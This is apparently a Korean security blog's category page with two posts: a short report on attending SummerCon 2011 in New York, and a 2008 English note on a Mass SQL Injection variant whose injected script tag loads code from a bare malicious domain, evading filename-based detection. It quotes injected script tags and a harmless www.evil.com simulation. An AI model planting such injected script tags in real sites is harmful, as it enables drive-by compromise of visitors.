'Security/Trends'에 해당되는 글 2

  1. 2011.08.22 뉴욕 해커들의 축제, 썸머콘 (SeedGen) (1)
  2. 2008.09.06 A little change of Mass SQL Injection Attack

조금 늦은 감이 있지만, 2011년 6월 10일 뉴욕에서 개최된 썸머콘(SummerCon)에 대한 참가후기를 공유합니다. “즐기는 자에겐 이길 수 없다”란 말이 컨퍼런스 내내 떠나질 않았습니다. 썸머콘에서 축제를 즐기는 이들의 모습을 함께 하면서 많은 것들을 느낄 수 있었습니다.

내년은 썸머콘의 15주년이라고 합니다. 유일한 한국인으로 저 혼자 참여한 올해와는 다르게 많은 사람들이 참가해서 뉴욕에 있는 보안인들과의 교류를 가질 수 있었으면 하는 바람입니다.

※ 본 문서는 씨드젠(SeedGen, http://www.seedgen.net)에서 작성되고 공개되는 것입니다.


신고
Yesterday, our company's engineer told me that it was a strange thing to our customer's database. 

It was the Mass SQL Injection Attack pattern besides ONE thing. They didn't have JavaScript on URI. The value of its JavaScript Source was only the domain name. I couldn't take a evil content of the domain because He couldn't access the evil domain.

Normal Mass SQL Injection Attack patterns like below.
<script src="http://[malicious site's domain]/fuckjp.js"><script>

New pattern likes below.
<script src="http://[malicious site's domain]"><script>

I haven't been monitoring the Mass SQL Injection Attack. But I think it is important that they don't have JavaScript file name and extension name in their pattern. I simulated this attack.

First, I made a evil script file as web site(www.evil.com)'s index page.
alert('TEST');
 
Next, I made a simple HTML page which had a script tag like a infected web page.

Finally, when victims visited this page, he will see the message like below. This trick makes JavaScript file name matching meaningless.
If you need the lists of the evil domains used the Mass SQL Injection attack, please visit below site. It is collecting those.
신고
이전 1 다음

티스토리 툴바